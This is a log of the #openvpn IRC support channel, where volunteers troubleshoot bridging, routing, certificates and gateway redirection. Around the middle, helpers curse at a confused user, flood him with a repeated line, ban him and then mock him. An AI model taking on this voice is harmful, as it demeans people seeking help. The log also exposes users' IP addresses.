#openvpn 05:52 <+EugeneKay> Looks similar to VZ 05:52 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn 05:52 < latenite> EugeneKay, Basicly like any other VM. I dont know the basic on the networking side. No matter what kind of VM 05:53 < latenite> EugeneKay, yes it is :D 05:53 <+EugeneKay> Basically, you want the VM to have it's own IP address on the LAN. 05:53 < latenite> EugeneKay, would I have to add additional NICs? 05:53 <+EugeneKay> This is typically known as Bridged Mode 05:53 <+EugeneKay> Physical NIC cards? No. 05:53 < DaveTheDude> hey i was just wondering if anyone could explain the function and use of pkcs11? 05:53 < latenite> EugeneKay, there is no LAN. The host is a rootserver with public IP. 05:53 < DaveTheDude> and the benefit if there is any 05:54 < latenite> The VM has a public as well 05:54 <+EugeneKay> latenite - The "public IP" is a "LAN" for the definition of this exercise 05:54 < latenite> EugeneKay, ok :D 05:54 <+EugeneKay> DaveTheDude - PKI stored on a "Smart Card", basically. 05:54 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 05:55 < latenite> EugeneKay, for now the host has a br0 with the eth0 connecet to it. The host can reach the intenet fine 05:55 <+EugeneKay> DaveTheDude - plus the interface for applications to speak to the smart card for doing crypto stuff using keys/certs stored on the card, without the application actually knowing the private keys 05:55 <+EugeneKay> latenite - sounds right. Now you need to connect the container to br0 05:55 < latenite> The guest is connectet to the bridg (by the VM setup) 05:55 < DaveTheDude> oh i see 05:56 < DaveTheDude> well then it is completely useless to me 05:56 < DaveTheDude> thanks EugeneKay 05:56 <+EugeneKay> DaveTheDude - It's limited-use, yes. Mostly the paranoid who don't trust the $SYSTEM, or can't for regulatory reasons(banks, gov't) 05:56 < latenite> EugeneKay, it is connected to the br0 by ...line 15 https://gist.github.com/anonymous/5098689 05:57 <@vpnHelper> Title: gist:5098689 (at gist.github.com) 05:57 < DaveTheDude> thanks again EugeneKay 05:57 < DaveTheDude> have a nice day 05:57 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 05:58 <+EugeneKay> latenite - yeah, that config file is Greek to me 05:58 <+EugeneKay> Sorry 05:58 <+EugeneKay> Try to see if they have an IRC channel 05:58 < latenite> EugeneKay, but the hosts br0 and the VMs eth0 have totaly differnt networks 05:58 < latenite> I already tried. No luck :( 05:59 < latenite> EugeneKay, It not so much about the technologie like LXC, or Vbox. 05:59 <+EugeneKay> With vbox and vmware I've not had to fiddle with br0 in years 05:59 <+EugeneKay> I just set it to Bridge and it does it 05:59 < latenite> EugeneKay, what I dont know is: how to connect a VM to a host when they are on different networks...jet, connected to the same bridge 06:00 <+EugeneKay> Whaddya mean different networks? VLANs? 06:00 <+EugeneKay> Or different IP blocks? 06:01 < latenite> EugeneKay, the host is: inet addr: 176.9.147.201 Bcast:176.9.147.223 Mask:255.255.255.224 06:01 <+EugeneKay> Addressing is layer3; bridging etc is layer2. 06:02 < latenite> and the VM is: inet addr: 5.9.233.2 Bcast:5.9.233.7 06:02 <+EugeneKay> So don't worry about that 06:02 <+EugeneKay> The VM and the Host both send an ARP(L2) for their respective IP addresses(L3) to the switch 06:03 <+EugeneKay> Note: it looks like your VM has a MAC address beginning with 00:00:00:. This is probably not going to work. Change that to a real vendor ID. 06:03 < latenite> So I should be able to ping from 5.9.233.2 to 176.9.147.201 ? When they are both on the same bridge? 06:04 < latenite> there is no route set up. 06:04 <+EugeneKay> Correct. It will go out the VM's interface, to the switch and on to the router, then back down the chain. 06:04 < latenite> so how would that ever work? 06:04 < latenite> which router? 06:04 <+EugeneKay> Your datacenter's 06:04 <+EugeneKay> It' the same as any other IP address on the internet, except that the src and dest both happen to exist on the same physical machine 06:05 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:05 < latenite> So since ping fails. Something else must be wrong. 06:05 <+EugeneKay> If you want to talk directly between the VM and Host you will need to set up "Host Only" networking, which is implemented as a loopback adapter. 06:06 <+EugeneKay> If I had to guess, it's your switch rejecting the MAC address of the VM 06:06 < latenite> what would be a valid MAC? 06:07 < latenite> EugeneKay, simply no 0 up front? 06:08 <+EugeneKay> VMware uses 00:0c:29:. Try that. 06:09 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:09 < latenite> EugeneKay, still fails 06:09 * EugeneKay shrugs 06:10 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:10 < latenite> EugeneKay, in the VM I can only ping its own IP 06:10 <+EugeneKay> Probably something with the bridge. No clue what :-p 06:15 < vaillor> EugeneKay, have you got a step-by-step guide tu set the vpn? 06:20 <+EugeneKay> !howto 06:20 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 06:20 <+EugeneKay> latenite - yup, indicates something's wrong with the bridge. See above :-p 06:23 < latenite> EugeneKay, Would you know a way to test the bridge? 06:27 < latenite> EugeneKay, I cant ping the VM from the host either. 06:27 <+EugeneKay> Like I said, it's been ages since I've fiddled with bridging. If you're patient I'm sure somebody with more clue will be around 06:30 < latenite> sure, thank you. I ll just stick around 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:08 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 07:09 < TMcTrain> hello 07:10 < TMcTrain> !welcome 07:10 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 07:10 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 07:10 < TMcTrain> !goal 07:10 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 07:23 < TMcTrain> hello I do have the following setup : eth0=WAN; eth1=LAN(192.168.2.1) : eth0=LAN(192.168.2.128); eth1=LAN(192.168.30.1) : eth0=LAN(192.168.30.10) 07:25 < TMcTrain> is isolated from WAN does not have routing enabled for eth1 to eth0 07:32 < TMcTrain> on I installed opwnvpn access server, forwarded the port from to and managed to set it up to allow to connect to and get a ip-address : LAN=192.168.30.101 07:34 < TMcTrain> from : I can ping : 192.168.30.1 and connect over ssh 07:36 < TMcTrain> I can access from 07:36 < TMcTrain> but I can neither access from nor from 07:37 < TMcTrain> is there a special setting on openvpn access server GUI to get the : LAN=192.168.30.101 to get access directly to : eth1=192.168.30.10 07:38 < TMcTrain> ? 07:39 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 276 seconds] 07:41 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 07:44 < rob0> !as 07:44 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 07:45 < TMcTrain> tx 07:45 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 07:53 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn 07:54 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 07:54 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 07:55 < magic_1> hi guys, i just want to make sure how i should tell my server config file about my ccd 07:55 < magic_1> cause it pushes the routes but not seeing the ccd routes? 07:56 < magic_1> just doesnt make sense to me 08:00 <+EugeneKay> You put iroute in the ccd file, and route in your server.conf 08:00 <+EugeneKay> iroute only serves to tell the server which client is responsible for the subnet 08:00 <+EugeneKay> !route 08:01 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 08:01 <@vpnHelper> behind the server or client 08:07 < magic_1> thanks EugeneKay 08:07 < magic_1> was just busy with the server 08:08 < magic_1> the issue that i am having is that site B can ping and access all devices in site A, but site A cant ping or access any devices in Site B 08:08 < magic_1> although both have the required routes 08:08 <+EugeneKay> Sounds like firewall 08:08 < magic_1> i have stopped the firewall on site B to check 08:08 < magic_1> but nothing 08:09 < magic_1> the ping request are going throught to the tun interface on B, but not through, 08:09 <+EugeneKay> You have ip_forwarding turned on? 08:09 <+EugeneKay> Both ends 08:09 < magic_1> i can ping site B tun interface 08:09 < magic_1> yea 08:09 <+EugeneKay> Check the A firewall rules too 08:10 <+EugeneKay> FORWARD table is of the most interest 08:10 < magic_1> will do that now, just thinking though, the requests are reaching the site B tun interface 08:10 < magic_1> just not going through 08:10 < magic_1> and i have check ip_forwarding is on 08:10 <+EugeneKay> Double check your routes 08:11 <+EugeneKay> They might be going to the wrong place 08:11 < magic_1> even set them up statically 08:11 <+EugeneKay> Just keep beating up on it, you'll find it 08:11 <+EugeneKay> You've come this far, you clearly have enough of a understandig ;-) 08:12 < magic_1> thanks brother, doing that as we as speak 08:12 < magic_1> at the moment even trying via routing protocol to see if that is not the issue, the routes are going through no hassle, but only one side working 08:12 < magic_1> but will do 08:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:35 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [Read error: No route to host] 08:50 -!- novaflash is now known as novaflash_away 09:00 -!- novaflash_away is now known as novaflash 09:11 -!- p3rror [~mezgani@41.140.180.37] has joined #openvpn 09:26 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 09:27 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Max SendQ exceeded] 09:28 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 09:32 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:32 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 250 seconds] 09:39 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 09:39 -!- raidz_away is now known as raidz 09:39 -!- raidz [~raidz@raidz.im] has quit [Changing host] 09:39 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 09:39 -!- mode/#openvpn [+o raidz] by ChanServ 09:59 < kjs> Guys, I need to generate a self signed certificate for OpenVPN clients, if i copy the CA.crt and key onto my windows desktop I can generate this using easy rsa scripts, right? 10:00 < kjs> they should be in /etc/openvpn/ssl - right ? 10:01 <@ecrist> why not just generate them on the box that has the ca.crt and key now? 10:04 < kjs> there is no easyrsa on that box ? 10:04 <@ecrist> where did you generate certificates before? 10:05 <@ecrist> generally, you need or will want the index for openssl, as well, or you run the risk of duplicate certificates 10:05 < kjs> iv just taken over this, last admins documentation says to do it on another linux server here with openssl installed... 10:06 <@ecrist> ok, so do that. 10:06 < kjs> then gives a https urls to wget the CA cert & key from, that does not exist. 10:06 < kjs> so... I am looking for the right key / cert 10:07 < kjs> should they be at /etc/openvpn/ssl ? 10:07 <@ecrist> they might be 10:07 <@ecrist> truth is, we have no way of knowing where your other admin put the CA cert/key pair 10:08 < kjs> Yeah, i could install openssl on that server and try and sign the keys against that CA and see if it would auth ? 10:09 < kjs> I need the server.key and CA.crt file to generate them, right? 10:09 <@ecrist> no 10:09 <@ecrist> you need the CA.crt and CA.key 10:09 < kjs> hm 10:10 < kjs> that dir contains... 10:10 < kjs> dh1024.pem srv1-ca.crt srv1-server.crt srv1-server.key 10:11 <@ecrist> none of those are what you need 10:11 < kjs> thought so 10:11 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 10:11 <@ecrist> I already told you what to look for 10:11 < kjs> yeah looks like I am screwed then 10:12 <@ecrist> I'd find out what server ran that webserver, and go look there for them 10:15 -!- raidz is now known as raidz_away 10:15 -!- raidz_away is now known as raidz 10:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 10:24 -!- speed_racer8 [~speed_rac@76.30.149.251] has joined #openvpn 10:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:29 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:44 -!- Orbi [~opera@109.129.14.9] has joined #openvpn 10:50 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 10:52 -!- AsadH is now known as zz_AsadH 10:57 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn 10:57 < jzaw> afternoon all :) 11:03 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 11:03 <+[oc80z]> moin moin 11:08 -!- albercuba [~albercuba@p57B331F2.dip.t-dialin.net] has joined #openvpn 11:09 < albercuba> hello 11:09 < albercuba> some help please setting openvpn in uuntu 11:09 < kjs> sigh 11:09 < albercuba> ? 11:09 < albercuba> i can't make it work, need some help 11:09 < pekster> !howto 11:09 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 11:10 < albercuba> yes yes, i did read that 11:11 < albercuba> but i can't make it work 11:11 <@dazo> !welcome 11:11 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:11 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:11 <@dazo> !welcome 11:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:12 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:12 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 11:12 <@dazo> albercuba: ^^^ .... all who knows something in here and have time may help you out, if you provide the needed info 11:13 < albercuba> ok, i want t set up an openvpn server in ubuntu server 10.04, i did everything but i cant make it work 11:13 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:13 <@dazo> !welcome 11:13 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:13 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:13 <@dazo> albercuba: you didn't read that ^^^ 11:13 < albercuba> i can connect to the server but i cannot surf the web 11:14 < albercuba> dazo, not now, i did it yesterday 11:14 <@dazo> *sigh* 11:14 <@dazo> "we may need !logs and !configs and maybe !interface to help you." 11:14 < albercuba> i even looked for others how to, but they are all focused on lan networks 11:14 * dazo gives up 11:15 < pekster> !redirect 11:15 < albercuba> and the problem is that the server i'm using is in canada and have only 1 interface connectede directly to internet 11:15 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 11:15 <@vpnHelper> http://ircpimps.org/redirect.png 11:15 < albercuba> it is a vps 11:15 < pekster> Maybe that's what you want? You've specified none of your goals or explains "what" you've tried. If you say "it doesn't work" my only reply is "then it's clearly broken." Garbage in, garbage out 11:16 < albercuba> ok maybe i'm not good explaining things, and my english is not very good 11:17 < albercuba> will check the redirect 11:17 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 240 seconds] 11:22 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 11:25 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:29 -!- albercuba [~albercuba@p57B331F2.dip.t-dialin.net] has quit [Remote host closed the connection] 11:34 -!- latenite [~latenite@138.77.122.145] has quit [Ping timeout: 245 seconds] 11:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Ping timeout: 256 seconds] 11:42 -!- Orbi [~opera@109.129.14.9] has quit [Ping timeout: 245 seconds] 11:44 < vaillor> so, my openvpn still continues not working 11:45 -!- Orbi [~opera@anon-184-53.vpn.ipredator.se] has joined #openvpn 11:49 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 12:01 -!- Orbi [~opera@anon-184-53.vpn.ipredator.se] has quit [Ping timeout: 276 seconds] 12:06 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:06 -!- mode/#openvpn [+o krzee] by ChanServ 12:09 < vaillor> so, do you think is better to install ora openvpn-install-2.3.0-I004-i686.exe or privatetunnel.msi ? 12:09 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Quit: Computer has gone to sleep.] 12:10 < pekster> !download 12:10 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 12:10 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 12:13 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:14 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 12:14 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 12:17 -!- master_o1_master [~master_of@p4FF24E11.dip.t-dialin.net] has joined #openvpn 12:18 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:20 -!- master_of_master [~master_of@p4FF24D0D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 12:24 < vaillor> pekster, there are no information about privatetunnel.msi 12:26 < pekster> Indeed. That's the propritary commercial product sold by OpenVPN Technologies. This channel is for support/discussion of the GPL OpenVPN open-source project 12:29 <@ecrist> vaillor: I think there's a private tunnel channel. probably better to ask in #openvpn-as though 12:30 < vaillor> ok 12:30 < vaillor> and what is the official website of openvpn website? 12:31 <@ecrist> openvpn.net 12:31 < vaillor> because i found privatetunnel.msi at http://openvpn.net/ 12:31 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 12:31 <@ecrist> yup 12:31 <+EugeneKay> Jesus tittyfucking christ dude 12:31 <+EugeneKay> How hard is it to comprehend 12:31 <+EugeneKay> There is the OpenVPN Commercial product, and the OpenVPN GPL product 12:31 <+EugeneKay> TWO SEPARATE PROGRAMS 12:31 <@ecrist> OpenVPN has a community (open source) and commercial component 12:31 <+EugeneKay> This is literally the fourth fucking time it has been explained to you 12:31 < vaillor> yes, and they are two different things? 12:32 <@ecrist> we support the community (open source) component here 12:32 <@ecrist> private tunnel and access server are commercial components 12:32 <@ecrist> they are supported in #openvpn-as 12:32 < vaillor> yes but if they are 2 different things, why the website is the same? 12:32 <@ecrist> OpenVPN has a community (open source) and commercial component 12:32 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 -!- mode/#openvpn [+o EugeneKay] by ChanServ 12:33 -!- mode/#openvpn [+b *!*lol2@*.ip179.fastwebnet.it] by EugeneKay 12:33 -!- vaillor was kicked from #openvpn by EugeneKay [I'm done. Good bye.] 12:33 <@EugeneKay> Two days of this guy. Screw it. 12:33 -!- mode/#openvpn [-o EugeneKay] by EugeneKay 12:33 <@krzee> i ignored him damn near immediately, but i knew it was only a matter of time til he got himself banned 12:33 <+EugeneKay> I tried to be patient, really I did. 12:34 <@krzee> i believe dazo ignored him at the same time 12:34 <@krzee> haha 12:34 <+EugeneKay> And I just realized I'm wearing my OpenVPN shirt 12:34 <@krzee> [13:33] that lil outburst won you a /ig lol 12:34 <@krzee> [13:34] *!*lol2@2-226-37-187.ip179.fastwebnet.it added to ignore list. 12:34 <@krzee> [13:34] * dazo follows krzee's example 12:35 * EugeneKay gets beer 12:35 <@ecrist> lol 12:36 <@ecrist> krzee: btw, we got our OSPF + OpenVPN working smoothly now 12:36 <@krzee> badass! 12:36 <+EugeneKay> Shiny 12:36 <@ecrist> with redundancy and failover, as well 12:36 <@ecrist> :D 12:37 <@krzee> my ospf is held together by magic 12:37 < pekster> Not more magic? 12:38 <@ecrist> FreeBSD + Bird + OpenVPN = win 12:38 <+hazardous> i just scrolled up 12:38 <@krzee> ++ 12:38 <+hazardous> he wasn't even referring to AS 12:38 <@ecrist> hazardous: nobody said he was 12:38 <+hazardous> i kinda giggled 12:38 -!- IceGuest_77 [~IceChat77@smtp.utiglobal.net] has joined #openvpn 12:38 -!- IceGuest_77 is now known as IceGuest_77_ 12:39 < pekster> http://www.catb.org/jargon/html/magic-story.html 12:39 <@vpnHelper> Title: A Story About ‘Magic' (at www.catb.org) 12:39 <+EugeneKay> PrivateTunnel.msi is the AS client 12:40 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 12:40 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 12:40 <@ecrist> wrapped in a different logo, with other config goo, iirc 12:40 <@krzee> pekster, im lol'ing 12:40 -!- IceGuest_77_ is now known as computron 12:40 <+hazardous> ecrist: yeah that was my thought, it's AS but proprietarily configured and other stuff 12:41 <@novaflash> hey i heard you guys kicked a private tunnel user 12:41 <+hazardous> anyways, he's now in the as channel complaining about his ban and asking about privatetunnel 12:41 <+hazardous> hahahaha 12:41 <@ecrist> novaflash: yup 12:41 <@novaflash> good job 12:41 <@novaflash> ;) 12:41 <@ecrist> :D 12:41 <@krzee> LOL 12:41 <@novaflash> just tell him to go to support@privatetunnel.com 12:41 <@ecrist> novaflash: welcome to the suck 12:41 <@novaflash> maybe we should have a factoid here 12:41 <@novaflash> like !pt omg fuck off to support@privatetunnel.com already 12:41 <@krzee> !learn privatetunnel as go to support@privatetunnel.com for support! 12:41 <@vpnHelper> Joo got it. 12:41 <@novaflash> thanks 12:41 <@novaflash> that'll work nicely 12:42 <@krzee> !learn pt as [privatetunnel] 12:42 < computron> Hey guys quick question i am tryint to reset the admin account password from cmdline can anyone help me out with that? 12:42 <@vpnHelper> Joo got it. 12:42 <@krzee> !pt 12:42 <@vpnHelper> "pt" is "privatetunnel" is go to support@privatetunnel.com for support! 12:42 <@novaflash> computron: is this for access server? 12:42 < computron> yes novaflash 12:42 <+EugeneKay> !as 12:42 <@krzee> !as 12:42 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:42 <+hazardous> why are you asking in here?! 12:42 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:42 < computron> will do thanks fro the direction!! 12:42 <+hazardous> yay 12:42 <+EugeneKay> Some day we shall teach people to read the /topic 12:42 <+EugeneKay> But not today 12:43 < pekster> Here and the rest of Freenode... 12:43 <@novaflash> computron: then join #openvpn-as please 12:45 <@ecrist> reading pekster's link, I immediately feel like an EE geek of some sort, having promptly thought what was listed at the end as a possible explaination 12:47 < pekster> Yea, some capacitive reactance or something. It's still a cool story that I've loved re-reading now and then 12:48 <+EugeneKay> !fail2ban 12:48 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 12:49 <+hazardous> i think the guy you banned is about to make novaflash cry 12:49 <+hazardous> lol 12:50 <@krzee> lol 12:50 * EugeneKay gets a hanky ready 12:50 <@ecrist> !magic 12:50 <+hazardous> what's !magic do 12:50 <@novaflash> no worries mate 12:50 <+EugeneKay> Nothing, it seems. 12:50 <@novaflash> guys like these, i eat for breakfast 12:50 <@ecrist> !learn magic as For a story about magic read http://www.catb.org/jargon/html/magic-story.html 12:50 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 12:50 <+hazardous> novaflash: seriously i pity you dealing with people like this all day 12:50 <@krzee> nice 12:50 <@ecrist> fuck you, vpnHelper 12:50 <@ecrist> !whoami 12:50 <@vpnHelper> ecrist 12:50 <@krzee> !learn magic as For a story about magic read http://www.catb.org/jargon/html/magic-story.html 12:50 <@vpnHelper> Joo got it. 12:50 <@novaflash> dealing with krzee is much tougher 12:50 <@ecrist> tanks 12:50 <@krzee> bro i told you you needed to fix you on the bot 12:51 <@krzee> i fubar'ed it by accident 12:51 <@ecrist> I DID 12:51 <@krzee> sorry 12:51 <@krzee> oh, shit 12:51 <@ecrist> or did you fuck it up again 12:51 <@krzee> i guess it got fubared again 12:51 <@krzee> nah only 1x 12:51 <@ecrist> lol 12:51 <+EugeneKay> You must not have added me again 12:51 <@krzee> did you do the permissions like i had? 12:51 <@krzee> cause i did those right, a bunch were messed up before 12:51 <@dazo> pekster: ecrist: I spoke with a guy who did computer lab works in the early 80s ... they had stability issues with a server, and an expert from the UK came over ... looked at the circuit board, took out a knife and destroyed one of the connections to a pin ... and the server was completely stable ever since 12:53 <+EugeneKay> I'm a fan of percussive maintenance 12:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 12:54 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 12:55 <@dazo> hehe 12:56 <@dazo> EugeneKay: I'm sometimes tempted to use that on computer users asking for support for the nth-time as well .... 12:56 <+EugeneKay> https://www.xkcd.com/1180/ 12:56 <@vpnHelper> Title: xkcd: Virus Venn Diagram (at www.xkcd.com) 12:57 < pekster> I don't mind helping with language or when lack of the right resources is the issue, but when someone actively refuses to read the resources, it's eventually a waste of time :\ 12:57 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 276 seconds] 12:58 <@dazo> pekster++ 12:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 256 seconds] 13:03 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:03 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 13:04 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 13:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:05 -!- mode/#openvpn [+o krzee] by ChanServ 13:05 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 13:05 < Azrael_-> hi 13:07 < Azrael_-> i've got a small problem: one client worked perfectly, i moved it to a different location (other city) and fired it up. now the tunnel works, ping works but i can't access the network shares of windows. before moving it worked. other clients work just fine. any ideas? 13:08 < pekster> You're tring to access file shares from the client at the VPN IP, or on a PC on a LAN behind the server? 13:08 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:08 <+EugeneKay> Something something DNS 13:08 <@krzee> did you move to a location where you are on the same subnet as the lan you're trying to access over the vpn? 13:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:08 < Azrael_-> i access the share using ip, no names 13:09 < Azrael_-> krzee: if it was, the ping wouldn't work 13:09 <+EugeneKay> You'd be surprised 13:09 <@krzee> access share using LAN ip or VPN ip? 13:09 < pekster> Not if there was a duplicate machine with the same IP locally, or something redirecting the pings 13:09 < pekster> krzee: IPv6 fixes that. #justsaying ;) 13:09 <@krzee> pekster, :-p 13:10 <@krzee> not if everyone uses the same local subnet in ipv6 13:10 <@krzee> theres plenty for use in ipv4, people just get retarded and always use the same ones 13:10 < Azrael_-> i've used 10.8.0.x for openvpn and the local net is in 192.168.0.x 13:11 <+EugeneKay> Something changed. Find it. 13:11 <@krzee> and what ip are you mounting the share from 13:11 < Azrael_-> EugeneKay: as long as i don't hae the slightest clue it's getting difficult 13:11 <@krzee> (for the third time) 13:11 < Azrael_-> krzee: 10.8.0.1 13:11 < Azrael_-> sorry 13:11 <@krzee> and what machine is trying to mount a share on 10.8.0.1, the client machine? 13:12 < Azrael_-> client 10.8.0.18 -> server 10.8.0.1 (network share) 13:12 <@krzee> can the server ping the client? 13:12 < Azrael_-> yes 13:12 <@krzee> do it now 13:12 <@krzee> dont answer from prior testing 13:13 < Azrael_-> gnarf, and just now teamviewer doesn't 